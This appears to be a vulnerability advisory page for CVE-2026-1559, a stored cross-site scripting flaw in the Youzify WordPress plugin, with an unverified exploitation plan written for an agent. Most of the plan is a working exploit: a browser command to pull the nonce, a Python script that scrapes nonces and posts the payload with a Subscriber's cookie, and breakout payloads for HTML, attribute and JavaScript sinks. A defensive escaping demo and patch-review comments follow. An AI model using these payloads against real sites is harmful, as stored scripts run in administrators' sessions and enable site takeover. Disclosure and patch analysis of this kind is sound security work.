CVE-2026-1559

Youzify <= 1.3.6 - Authenticated (Subscriber+) Stored Cross-Site Scripting via 'checkin_place_id' Parameter

Weakness: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSS Score: 6.4
Severity: Medium
Patched in: 1.3.7
Time to patch: 1d

Description

The Youzify plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'checkin_place_id' parameter in all versions up to, and including, 1.3.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Scope: Changed
Confidentiality: Low
Integrity: Low
Availability: None

Technical Details

Affected versions: <= 1.3.6
Published: April 17, 2026
Last updated: April 18, 2026
Affected plugin: youzify

What Changed in the Fix

Changes introduced in v1.3.7

Source Code

WordPress.org SVN
Research Plan
Unverified

Exploitation Research Plan: CVE-2026-1559 - Youzify Stored XSS

1. Vulnerability Summary

The Youzify plugin (formerly Youzer) for WordPress is vulnerable to Stored Cross-Site Scripting (XSS) in versions up to and including 1.3.6. The vulnerability exists because the plugin fails to sanitize or escape the checkin_place_id parameter when processing and displaying activity updates with "check-in" location data. An authenticated attacker with Subscriber-level access can inject malicious scripts into this parameter, which are then executed in the context of any user (including administrators) viewing the activity feed.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Action: youzify_post_update (Registered via bp_ajax_register_action in class-youzify.php, Line 118).
  • Vulnerable Parameter: checkin_place_id
  • Authentication Required: Subscriber (PR:L) or higher.
  • Preconditions: BuddyPress must be active (Youzify depends on it), and the "Check-in" feature must be available on the activity wall.

3. Code Flow

  1. Entry Point: The client sends an AJAX request to admin-ajax.php with the action youzify_post_update.
  2. Registration: class-youzify.php hooks this action via BuddyPress:
    bp_ajax_register_action( 'youzify_post_update' );
    
  3. Processing (Inferred): The logic resides in YOUZIFY_CORE . 'functions/general/youzify-wall-functions.php' (included in class-youzify.php, Line 50) or class-youzify-ajax.php. The handler retrieves $_POST['checkin_place_id'] and saves it as activity metadata using bp_activity_add_meta() or stores it directly within the activity content string.
  4. Display Sink (Inferred): When the activity stream is rendered (frontend or backend), Youzify retrieves this metadata and outputs it inside an HTML attribute (e.g., data-place-id="...") or as part of a Google Maps initialization script without using esc_attr() or esc_js().

4. Nonce Acquisition Strategy

The youzify_post_update action is protected by a BuddyPress/Youzify nonce.

  1. Shortcode Identification: The Youzify activity wall is typically rendered using the shortcode [youzify_activity].
  2. Setup: Create a public page containing this shortcode.
  3. Extraction:
    • Navigate to the page as an authenticated Subscriber.
    • Youzify localizes its configuration into a global JavaScript object. Use browser_eval to extract the nonce.
    • Potential Variable: youzify_vars.activity_nonce or youzify_vars.nonce.
    • Form Field: Check for a hidden input named _wpnonce_post_update inside the activity posting form.

Agent Command:

// Attempt to find the nonce in localized vars or form fields
browser_eval("window.youzify_vars?.activity_nonce || jQuery('#_wpnonce_post_update').val() || jQuery('input[name=\"_wpnonce\"]').val()");

5. Exploitation Strategy

The exploit involves sending a POST request to the AJAX endpoint simulating an activity update with a malicious location ID.

HTTP Request:

  • URL: {{BASE_URL}}/wp-admin/admin-ajax.php
  • Method: POST
  • Headers:
    • Content-Type: application/x-www-form-urlencoded
    • Cookie: {{SUBSCRIBER_COOKIES}} (the authenticated Subscriber's WordPress session cookies)
  • Body Parameters:
    • action: youzify_post_update
    • _wpnonce_post_update: {{EXTRACTED_NONCE}}
    • content: Enjoying the view! #CheckIn
    • checkin_place_id: "><script>alert(document.domain)</script>
    • checkin_place_name: Malicious Location
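The nonce-extraction and request-building steps in sections 4 and 5, written out as an added Python example (not plugin code and not part of the original plan). It assumes the two nonce locations the plan guesses at, a youzify_vars object localized into the page and a hidden _wpnonce_post_update input, and parses a constructed page fragment containing both; the network call is kept in its own function so the parsing can be exercised offline.

```python
import json
import re
import urllib.parse
import urllib.request
from html.parser import HTMLParser

AJAX_PATH = "/wp-admin/admin-ajax.php"
XSS_PROBE = '"><script>alert(document.domain)</script>'  # payload named in the plan

# Constructed sample of what a page carrying [youzify_activity] might emit.
# The youzify_vars key names and the hidden-field name are assumptions taken
# from the plan's candidate list, not confirmed Youzify markup.
SAMPLE_HTML = """
<script type="text/javascript">
/* <![CDATA[ */
var youzify_vars = {"ajax_url":"https:\\/\\/example.test\\/wp-admin\\/admin-ajax.php","activity_nonce":"a1b2c3d4e5"};
/* ]]> */
</script>
<form id="whats-new-form" method="post">
  <input type="hidden" id="_wpnonce_post_update" name="_wpnonce_post_update" value="f6e5d4c3b2" />
</form>
"""

# wp_localize_script() output has the shape `var NAME = {...};`
_LOCALIZED = re.compile(r"var\s+youzify_vars\s*=\s*(\{.*?\})\s*;", re.DOTALL)


class _NonceInputs(HTMLParser):
    """Collect <input> fields whose name (or id) looks like a WordPress nonce."""

    def __init__(self):
        super().__init__()
        self.found = {}

    def handle_starttag(self, tag, attrs):
        if tag != "input":
            return
        a = dict(attrs)
        name = a.get("name") or a.get("id") or ""
        if "nonce" in name and a.get("value"):
            self.found["input." + name] = a["value"]


def extract_nonces(html):
    """Return every nonce candidate on the page, keyed by where it was found."""
    found = {}
    m = _LOCALIZED.search(html)
    if m:
        try:
            for key, value in json.loads(m.group(1)).items():
                if "nonce" in key and isinstance(value, str):
                    found["youzify_vars." + key] = value
        except json.JSONDecodeError:
            pass  # localized object was not plain JSON; fall back to form fields only
    p = _NonceInputs()
    p.feed(html)
    p.close()
    found.update(p.found)
    return found


def build_post_update(nonce, place_id, content="Enjoying the view! #CheckIn"):
    """Form body for the youzify_post_update action exactly as the plan lists it."""
    return {
        "action": "youzify_post_update",
        "_wpnonce_post_update": nonce,
        "content": content,
        "checkin_place_id": place_id,
        "checkin_place_name": "Malicious Location",
    }


def send_post_update(base_url, cookie, fields, timeout=10):
    """POST the form to admin-ajax.php with the Subscriber's session cookie.
    Network call: run only against a lab site you own."""
    body = urllib.parse.urlencode(fields).encode()
    req = urllib.request.Request(
        base_url.rstrip("/") + AJAX_PATH, data=body, method="POST",
        headers={"Content-Type": "application/x-www-form-urlencoded",
                 "Cookie": cookie},
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.status, resp.read().decode(errors="replace")


if __name__ == "__main__":
    nonces = extract_nonces(SAMPLE_HTML)
    print("nonce candidates:", nonces)
    print(build_post_update(nonces["input._wpnonce_post_update"], XSS_PROBE))
```

Because the plan is not sure which nonce the handler checks, extract_nonces returns all candidates rather than one; try the form field first, since that is what the plugin's own JavaScript would submit, and fall back to the localized value. The cookie is sent as a header, not as a form field.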

6. Test Data Setup

  1. Plugin Installation: Install Youzify 1.3.6 and BuddyPress.
  2. User Creation: Create a user with the subscriber role.
  3. Page Creation:
    wp post create --post_type=page --post_title="Activity Feed" --post_status=publish --post_content='[youzify_activity]'
    
  4. Configuration: Ensure that the "Check-in" or "Location" feature is enabled in Youzify settings (Wall Settings).

7. Expected Results

  • The AJAX response should return a success status (usually JSON {"success": true, "data": "..."}).
  • A new activity item will be created in the database.
  • When an administrator views the "Activity" page in the dashboard or the frontend feed, the injected script <script>alert(document.domain)</script> will execute.

8. Verification Steps

  1. Check Database via CLI:
    Verify the metadata was stored raw:
    wp db query "SELECT meta_value FROM wp_bp_activity_meta WHERE meta_key = 'checkin_place_id' ORDER BY id DESC LIMIT 1;"
    
  2. Check Activity Content:
    wp db query "SELECT content FROM wp_bp_activity ORDER BY id DESC LIMIT 1;"
    
  3. Verify Execution:
    Navigate to the Activity page as Admin using browser_navigate and check if the alert or a specific DOM element created by the script is present.

9. Alternative Approaches

If checkin_place_id is reflected inside an attribute rather than raw HTML, the payload should be adjusted:

  • Attribute Breakout: x" onmouseover="alert(1)" data-id="
  • JS Sink: If the ID is passed to a Google Maps function like initMap('PAYLOAD'), use: ');alert(1);//
  • Endpoint Check: If youzify_post_update is not the correct action, search the includes/ directory for wp_ajax_ hooks that reference "checkin" or "location" strings:
    grep -r "checkin_place_id" .
    
    (This would be the first step for the agent if the primary endpoint fails.)
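The three sinks inferred in section 3 (an HTML attribute, raw HTML, and a Google Maps initialisation call) and the sink-specific payloads in section 9, simulated in an added Python example. This is not Youzify's code and the templates are hypothetical: html.escape stands in for WordPress's esc_attr()/esc_html(), and json.dumps with `</` neutralised stands in for wp_json_encode(). The audit function checks whether the rendered fragment still has the shape the template intended, which is what a browser's HTML and JS parsers would otherwise be fooled by.

```python
import html
import json
import re
from html.parser import HTMLParser

# Payloads from the research plan.
HTML_BREAKOUT = '"><script>alert(document.domain)</script>'
ATTR_BREAKOUT = 'x" onmouseover="alert(1)" data-id="'
JS_BREAKOUT = "');alert(1);//"


def render_naive(place_id):
    """Hypothetical templates that splice the stored value in unescaped,
    i.e. the bug class the advisory describes."""
    return {
        "attr": f'<div data-place-id="{place_id}"></div>',
        "html": f'<span class="place">{place_id}</span>',
        "js":   f"<script>initMap('{place_id}');</script>",
    }


def render_escaped(place_id):
    """Same templates with escaping chosen per output context."""
    attr = html.escape(place_id, quote=True)        # esc_attr() / esc_html() role
    js_literal = json.dumps(place_id)               # wp_json_encode() role: emits the quotes itself
    js_literal = js_literal.replace("</", "<\\/")   # </script> inside a JS string still ends the <script>
    return {
        "attr": f'<div data-place-id="{attr}"></div>',
        "html": f'<span class="place">{attr}</span>',
        "js":   f"<script>initMap({js_literal});</script>",
    }


class _TagCollector(HTMLParser):
    """Record every start tag and attribute name the HTML parser sees."""

    def __init__(self):
        super().__init__()
        self.tags, self.attrs = [], set()

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.attrs.update(name for name, _ in attrs)


def _parse(fragment):
    c = _TagCollector()
    c.feed(fragment)
    c.close()
    return c


def audit(rendered):
    """Return the set of sinks where the value escaped its intended context."""
    bad = set()
    c = _parse(rendered["attr"])
    if c.tags != ["div"] or c.attrs != {"data-place-id"}:
        bad.add("attr")   # extra attribute or extra tag appeared
    c = _parse(rendered["html"])
    if c.tags != ["span"] or c.attrs != {"class"}:
        bad.add("html")   # a new element (e.g. <script>) was created
    m = re.fullmatch(r"<script>(.*)</script>", rendered["js"], re.DOTALL)
    inner = m.group(1) if m else ""
    # The script body must be exactly one call with one quoted string literal,
    # and must not contain "</", which the HTML tokenizer would treat as a tag.
    lit = re.fullmatch(r"initMap\(('(?:[^'\\]|\\.)*'|\"(?:[^\"\\]|\\.)*\")\);", inner)
    if not m or "</" in inner or lit is None:
        bad.add("js")
    return bad


if __name__ == "__main__":
    for name, payload in [("HTML", HTML_BREAKOUT), ("ATTR", ATTR_BREAKOUT), ("JS", JS_BREAKOUT)]:
        print(f"{name:4} naive -> {sorted(audit(render_naive(payload)))}  "
              f"escaped -> {sorted(audit(render_escaped(payload)))}")
```

The interesting result is that the plan's primary payload breaks all three naive sinks, while the attribute and JS variants only work in the sink they were built for, which is why the plan tells the agent to adjust the payload to the sink it actually finds. On the defensive side, esc_attr() alone would not be enough for the JS sink; the value must be emitted as a JSON literal with slashes escaped.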
    
Research Findings
Static analysis — not yet PoC-verified

Summary

The Youzify plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'checkin_place_id' parameter in versions up to 1.3.6. Authenticated attackers with Subscriber-level access can inject malicious web scripts into activity updates, which then execute in the context of any user (including administrators) viewing the activity stream.

Vulnerable Code

// class-youzify.php line 117
function register_actions() {
    bp_ajax_register_action( 'youzify_delete_activity' );
    bp_ajax_register_action( 'youzify_post_update' );
}

// Logic resides in YOUZIFY_CORE . 'class-youzify-ajax.php' (Included in class-youzify.php line 68)
// The handler for 'youzify_post_update' processes $_POST['checkin_place_id'] without sufficient sanitization before storage or output escaping during rendering.

Security Fix

diff -ru /home/deploy/wp-safety.org/data/plugin-versions/youzify/1.3.6/class-youzify.php /home/deploy/wp-safety.org/data/plugin-versions/youzify/1.3.7/class-youzify.php
--- /home/deploy/wp-safety.org/data/plugin-versions/youzify/1.3.6/class-youzify.php	2026-01-15 10:09:20.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/youzify/1.3.7/class-youzify.php	2026-03-15 20:18:08.000000000 +0000
@@ -1,4 +1,5 @@
-<?php
+<?php
+if ( ! defined( 'ABSPATH' ) ) exit;
 
 if ( ! class_exists( 'Youzify' ) ) :
 
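Review bot: this hunk does not touch the checkin_place_id handling the advisory describes; it only prepends an ABSPATH guard to class-youzify.php, which blocks direct HTTP requests to the file but changes nothing about how activity meta is sanitized on input or escaped on output. The `-<?php` / `+<?php` pair with identical visible text means the first line differs only in encoding or line ending (a BOM or CRLF), which should be confirmed so the patch is not carrying an accidental whitespace change. The sanitization change the advisory credits to 1.3.7 is not visible in the hunks shown here, so the diff should be checked against the full 1.3.6 to 1.3.7 changeset before this is cited as the fix.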
diff -ru /home/deploy/wp-safety.org/data/plugin-versions/youzify/1.3.6/includes/admin/class-youzify-admin.php /home/deploy/wp-safety.org/data/plugin-versions/youzify/1.3.7/includes/admin/class-youzify-admin.php
--- /home/deploy/wp-safety.org/data/plugin-versions/youzify/1.3.6/includes/admin/class-youzify-admin.php	2026-01-15 10:09:20.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/youzify/1.3.7/includes/admin/class-youzify-admin.php	2026-03-15 20:18:08.000000000 +0000
@@ -1,4 +1,5 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) exit;
 
 class Youzify_Admin {
 
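Review bot: same ABSPATH guard as in class-youzify.php, applied to the admin class; acceptable as defense in depth, but unrelated to the stored XSS and not to be read as its fix.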
@@ -148,7 +149,9 @@
             <div class="youzify-container">
                 <div class="youzify-review-image"><img src="<?php echo YOUZIFY_ADMIN_ASSETS . 'images/logo.png'; ?>" alt=""></div>
                 <div style="margin-left:30px">
-                    <?php printf(__("<p>Hi, Thanks a lot for choosing Youzify to be a part of your project — It's an honor!</p><p>In the past years we dedicated our lives by working day and night on Youzify doing our best to deliver high quality features and we are still constantly striving to provide ideal experience for our customers.</p><p>Online reviews from awesome customers like you help others feel confident about choosing Youzify, and will really help us grow our business. If you don't mind could you take a moment to leave us a 5-Star rating and a good review? I would really appreciate it. Thank you in advance for helping us out!</p><p>If you have any questions or feedback, %sdon't hesitate to leave us a message%s.</p>", 'youzify'),'<a href="https://youzify.com/contact" target="_blank" style="text-decoration: underline; color: #fff06e;">','</a>'); ?>
+                    <?php
+                    /* translators: %1$s: opening link tag, %2$s: closing link tag */
+                    printf( __( '<p>Hi, Thanks a lot for choosing Youzify to be a part of your project — It\'s an honor!</p><p>In the past years we dedicated our lives by working day and night on Youzify doing our best to deliver high quality features and we are still constantly striving to provide ideal experience for our customers.</p><p>Online reviews from awesome customers like you help others feel confident about choosing Youzify, and will really help us grow our business. If you don\'t mind could you take a moment to leave us a 5-Star rating and a good review? I would really appreciate it. Thank you in advance for helping us out!</p><p>If you have any questions or feedback, %1$sdon\'t hesitate to leave us a message%2$s.</p>', 'youzify' ), '<a href="https://youzify.com/contact" target="_blank" style="text-decoration: underline; color: #fff06e;">', '</a>' ); ?>
                     <i style="color: #ffeb3b;">- Youssef Kaine | KaineLabs CEO</i>
                     <div class="youzify-buttons-row">
                         <a class="button button-primary" target="_blank"
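Review bot: the translatable string passed to `printf( __( ... ) )` still embeds raw HTML (`<p>` elements and the `%1$s` / `%2$s` link tags) and is echoed without escaping, so a tampered translation file can inject arbitrary markup into this admin notice. The numbered placeholders and the `/* translators: ... */` comment are the right i18n change, but the output should be passed through wp_kses_post() or the markup moved out of the translatable string. This is an admin-side review prompt and has no bearing on the checkin_place_id sink.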

Exploit Outline

  1. Authenticate as a Subscriber-level user.
  2. Obtain a valid Youzify activity nonce (e.g., `_wpnonce_post_update`) by inspecting the activity feed page or the localized `youzify_vars` JavaScript object.
  3. Send a POST request to the WordPress AJAX endpoint `/wp-admin/admin-ajax.php` with the following parameters:
    • action: `youzify_post_update`
    • _wpnonce_post_update: [EXTRACTED_NONCE]
    • content: Any activity text
    • checkin_place_id: A malicious script payload such as `"><script>alert(document.domain)</script>`
    • checkin_place_name: A location name
  4. The script will be stored in the activity metadata and will execute whenever any user (including an Administrator) views the activity stream where the location data is rendered.
